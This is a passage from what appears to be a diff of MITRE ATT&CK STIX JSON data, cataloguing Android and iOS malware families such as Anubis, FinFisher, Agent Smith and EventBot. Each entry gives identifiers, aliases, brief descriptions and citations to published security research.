"mitre-attack", + "url": "https://attack.mitre.org/software/S0326", + "external_id": "S0326" + }, + { + "source_name": "RedDrop", + "description": "(Citation: Wandera-RedDrop)" + }, + { + "source_name": "Wandera-RedDrop", + "description": "Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018.", + "url": "https://www.wandera.com/reddrop-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "CHEMISTGAMES" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "type": "malware", + "created": "2020-12-31T18:25:04.779Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0555", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0555" + }, + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." + } + ], + "modified": "2021-03-25T16:42:05.526Z", + "name": "CHEMISTGAMES", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) is a modular backdoor that has been deployed by [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: CYBERWARCON CHEMISTGAMES)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-20T18:19:15.826Z", + "name": "YiSpecter", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) is a family of iOS and Android malware, first detected in November 2014, targeting users in mainland China and Taiwan. [YiSpecter](https://attack.mitre.org/software/S0311) abuses private APIs in iOS to infect both jailbroken and non-jailbroken devices.(Citation: paloalto_yispecter_1015)", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_aliases": [ + "YiSpecter" + ], + "type": "malware", + "id": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "created": "2017-10-25T14:48:48.301Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0311", + "external_id": "S0311" + }, + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Trojan-SMS.AndroidOS.Agent.ao", + "description": "[Trojan-SMS.AndroidOS.Agent.ao](https://attack.mitre.org/software/S0307) is Android malware. (Citation: Kaspersky-MobileMalware)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--a1867c56-8c86-455a-96ad-b0d5f7e2bc17", + "created": "2017-10-25T14:48:46.411Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0307", + "external_id": "S0307" + }, + { + "source_name": "Trojan-SMS.AndroidOS.Agent.ao", + "description": "(Citation: Kaspersky-MobileMalware)" + }, + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_aliases": [ + "Anubis" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "type": "malware", + "created": "2020-04-08T15:41:19.114Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0422", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0422" + }, + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." + } + ], + "modified": "2021-09-20T13:50:01.923Z", + "name": "Anubis", + "description": "[Anubis](https://attack.mitre.org/software/S0422) is Android malware that was originally used for cyber espionage, and has been retooled as a banking trojan.(Citation: Cofense Anubis)", + "x_mitre_version": "1.3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "AndroRAT", + "description": "[AndroRAT](https://attack.mitre.org/software/S0292) is malware that allows a third party to control the device and collect information. (Citation: Lookout-EnterpriseApps)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--a3dad2be-ce62-4440-953b-00fbce7aba93", + "created": "2017-10-25T14:48:47.363Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0292", + "external_id": "S0292" + }, + { + "source_name": "AndroRAT", + "description": "(Citation: Lookout-EnterpriseApps)" + }, + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows", + "Android" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_aliases": [ + "FinFisher", + "FinSpy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a5528622-3a8a-4633-86ce-8cdaf8423858", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0182", + "url": "https://attack.mitre.org/software/S0182", + "source_name": "mitre-attack" + }, + { + "source_name": "FinFisher", + "description": "(Citation: FinFisher Citation) (Citation: Microsoft SIR Vol 21) (Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017)" + }, + { + "source_name": "FinSpy", + "description": "(Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017)" + }, + { + "url": "http://www.finfisher.com/FinFisher/index.html", + "description": "FinFisher. (n.d.). Retrieved December 20, 2017.", + "source_name": "FinFisher Citation" + }, + { + "source_name": "Microsoft SIR Vol 21", + "description": "Anthe, C. et al. (2016, December 14). Microsoft Security Intelligence Report Volume 21. Retrieved November 27, 2017.", + "url": "http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", + "description": "Jiang, G., et al. (2017, September 12). FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY. Retrieved February 15, 2018.", + "source_name": "FireEye FinSpy Sept 2017" + }, + { + "source_name": "Securelist BlackOasis Oct 2017", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2017, October 16). BlackOasis APT and new targeted attacks leveraging zero-day exploit. Retrieved February 15, 2018.", + "url": "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/" + }, + { + "url": "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/", + "description": "Allievi, A.,Flori, E. (2018, March 01). FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex virtual machines. Retrieved July 9, 2018.", + "source_name": "Microsoft FinFisher March 2018" + } + ], + "modified": "2022-03-02T15:47:13.329Z", + "name": "FinFisher", + "description": "[FinFisher](https://attack.mitre.org/software/S0182) is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including [Wingbird](https://attack.mitre.org/software/S0176). (Citation: FinFisher Citation) (Citation: Microsoft SIR Vol 21) (Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017) (Citation: Microsoft FinFisher March 2018)", + "x_mitre_version": "1.4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_aliases": [ + "Agent Smith" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "type": "malware", + "created": "2020-05-07T15:18:34.417Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0440", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0440" + }, + { + "source_name": "CheckPoint Agent Smith", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020." + } + ], + "modified": "2020-06-17T12:49:21.423Z", + "name": "Agent Smith", + "description": "[Agent Smith](https://attack.mitre.org/software/S0440) is mobile malware that generates financial gain by replacing legitimate applications on devices with malicious versions that include fraudulent ads. As of July 2019 [Agent Smith](https://attack.mitre.org/software/S0440) had infected around 25 million devices, primarily targeting India though effects had been observed in other Asian countries as well as Saudi Arabia, the United Kingdom, and the United States.(Citation: CheckPoint Agent Smith)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Asacub", + "Trojan-SMS.AndroidOS.Smaps" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "type": "malware", + "created": "2020-12-14T15:02:35.007Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0540", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0540" + }, + { + "source_name": "Trojan-SMS.AndroidOS.Smaps", + "description": "(Citation: Securelist Asacub)" + }, + { + "source_name": "Securelist Asacub", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020." + } + ], + "modified": "2020-12-16T20:21:43.239Z", + "name": "Asacub", + "description": "[Asacub](https://attack.mitre.org/software/S0540) is a banking trojan that attempts to steal money from victims’ bank accounts. It attempts to do this by initiating a wire transfer via SMS message from compromised devices.(Citation: Securelist Asacub)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "GPlayed" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "type": "malware", + "created": "2020-11-24T17:55:12.561Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0536", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0536" + }, + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." + } + ], + "modified": "2020-11-24T17:55:12.561Z", + "name": "GPlayed", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) is an Android trojan with a broad range of capabilities.(Citation: Talos GPlayed) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "EventBot" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "type": "malware", + "created": "2020-06-26T14:55:12.847Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0478", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0478" + }, + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T21:01:58.595Z", + "name": "EventBot", + "description": "[EventBot](https://attack.mitre.org/software/S0478) is an Android banking trojan and information stealer that abuses Android’s accessibility service to steal data from various applications.(Citation: Cybereason EventBot) [EventBot](https://attack.mitre.org/software/S0478) was designed to target over 200 different banking and financial applications, the majority of which are European bank and cryptocurrency exchange applications.(Citation: Cybereason EventBot)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "HenBox" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "type": "malware", + "created": "2020-12-17T20:15:22.110Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0544", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0544" + }, + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." + } + ], + "modified": "2021-04-12T03:02:06.792Z", + "name": "HenBox", + "description": "[HenBox](https://attack.mitre.org/software/S0544) is Android malware that attempts to only execute on Xiaomi devices running the MIUI operating system. [HenBox](https://attack.mitre.org/software/S0544) has primarily been used to target Uyghurs, a minority Turkic ethnic group.(Citation: Palo Alto HenBox)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Riltok" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "type": "malware", + "created": "2019-08-07T15:57:12.877Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0403", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0403" + }, + { + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. Retrieved August 7, 2019.", + "url": "https://securelist.com/mobile-banker-riltok/91374/", + "source_name": "Kaspersky Riltok June 2019" + } + ], + "modified": "2019-09-18T13:44:13.080Z", + "name": "Riltok", + "description": "[Riltok](https://attack.mitre.org/software/S0403) is banking malware that uses phishing popups to collect user credentials.(Citation: Kaspersky Riltok June 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "GolfSpy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "type": "malware", + "created": "2020-01-27T17:05:57.712Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0421", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0421" + }, + { + "source_name": "Trend Micro Bouncing Golf 2019", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020." + } + ], + "modified": "2020-03-26T20:50:07.023Z", + "name": "GolfSpy", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) is Android spyware deployed by the group [Bouncing Golf](https://attack.mitre.org/groups/G0097).(Citation: Trend Micro Bouncing Golf 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Pallas" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "type": "malware", + "created": "2019-07-10T15:35:43.217Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0399", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0399" + }, + { + "source_name": "Pallas", + "description": "(Citation: Lookout Dark Caracal Jan 2018)" + }, + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-09-18T20:17:17.744Z", + "name": "Pallas", + "description": "[Pallas](https://attack.mitre.org/software/S0399) is mobile surveillanceware that was custom-developed by [Dark Caracal](https://attack.mitre.org/groups/G0070).(Citation: Lookout Dark Caracal Jan 2018)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Circles" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c6a07c89-a24c-4c7e-9e3e-6153cc595e24", + "type": "malware", + "created": "2021-04-26T15:33:55.798Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0602", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0602" + }, + { + "source_name": "CitizenLab Circles", + "url": "https://citizenlab.ca/2020/12/running-in-circles-uncovering-the-clients-of-cyberespionage-firm-circles/", + "description": "Bill Marczak, John Scott-Railton, Siddharth Prakash Rao, Siena Anstis, and Ron Deibert. (2020, December 1). Running in Circles Uncovering the Clients of Cyberespionage Firm Circles. Retrieved December 23, 2020." + } + ], + "modified": "2021-04-26T15:33:55.798Z", + "name": "Circles", + "description": "[Circles](https://attack.mitre.org/software/S0602) reportedly takes advantage of Signaling System 7 (SS7) weaknesses, the protocol suite used to route phone calls, to both track the location of mobile devices and intercept voice calls and SMS messages. It can be connected to a telecommunications company’s infrastructure or purchased as a cloud service. Circles has reportedly been linked to the NSO Group.(Citation: CitizenLab Circles)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Tiktok Pro" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "type": "malware", + "created": "2021-01-05T20:16:19.968Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0558", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0558" + }, + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "modified": "2021-04-19T16:30:16.930Z", + "name": "Tiktok Pro", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) is spyware that has been masquerading as the TikTok application.(Citation: Zscaler TikTok Spyware)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "PJApps", + "description": "[PJApps](https://attack.mitre.org/software/S0291) is an Android malware family. (Citation: Lookout-EnterpriseApps)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--c709da93-20c3-4d17-ab68-48cba76b2137", + "created": "2017-10-25T14:48:43.527Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0291", + "external_id": "S0291" + }, + { + "source_name": "PJApps", + "description": "(Citation: Lookout-EnterpriseApps)" + }, + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "ShiftyBug", + "description": "[ShiftyBug](https://attack.mitre.org/software/S0294) is an auto-rooting adware family of malware for Android. The family is very similar to the other Android families known as Shedun, Shuanet, Kemoge, though it is not believed all the families were created by the same group. (Citation: Lookout-Adware)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--c80a6bef-b3ce-44d0-b113-946e93124898", + "created": "2017-10-25T14:48:38.690Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0294", + "external_id": "S0294" + }, + { + "source_name": "ShiftyBug", + "description": "(Citation: Lookout-Adware)" + }, + { + "source_name": "Lookout-Adware", + "description": "Michael Bentley. (2015, November 4). Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire. Retrieved December 21, 2016.", + "url": "https://blog.lookout.com/blog/2015/11/04/trojanized-adware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-21T18:52:08.966Z", + "name": "HummingBad", + "description": "[HummingBad](https://attack.mitre.org/software/S0322) is a family of Android malware that generates fraudulent advertising revenue and has the ability to obtain root access on older, vulnerable versions of Android. (Citation: ArsTechnica-HummingBad)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "HummingBad" + ], + "type": "malware", + "id": "malware--c8770c81-c29f-40d2-a140-38544206b2b4", + "created": "2017-10-25T14:48:42.948Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0322", + "external_id": "S0322" + }, + { + "source_name": "ArsTechnica-HummingBad", + "description": "Dan Goodin. (2016, July 7). 10 million Android phones infected by all-powerful auto-rooting apps. Retrieved January 24, 2017.", + "url": "http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Exobot", + "Marcher" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "type": "malware", + "created": "2020-10-29T13:32:20.972Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0522", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0522" + }, + { + "source_name": "Proofpoint-Marcher", + "description": "Proofpoint. (2017, November 3). Credential phishing and an Android banking Trojan combine in Austrian mobile attacks. Retrieved July 6, 2018.", + "url": "https://www.proofpoint.com/us/threat-insight/post/credential-phishing-and-android-banking-trojan-combine-austrian-mobile-attacks" + }, + { + "source_name": "Threat Fabric Exobot", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020." + } + ], + "modified": "2020-12-07T14:28:31.876Z", + "name": "Exobot", + "description": "[Exobot](https://attack.mitre.org/software/S0522) is Android banking malware, primarily targeting financial institutions in Germany, Austria, and France.(Citation: Threat Fabric Exobot)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "OBAD", + "description": "OBAD is an Android malware family. (Citation: TrendMicro-Obad)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": 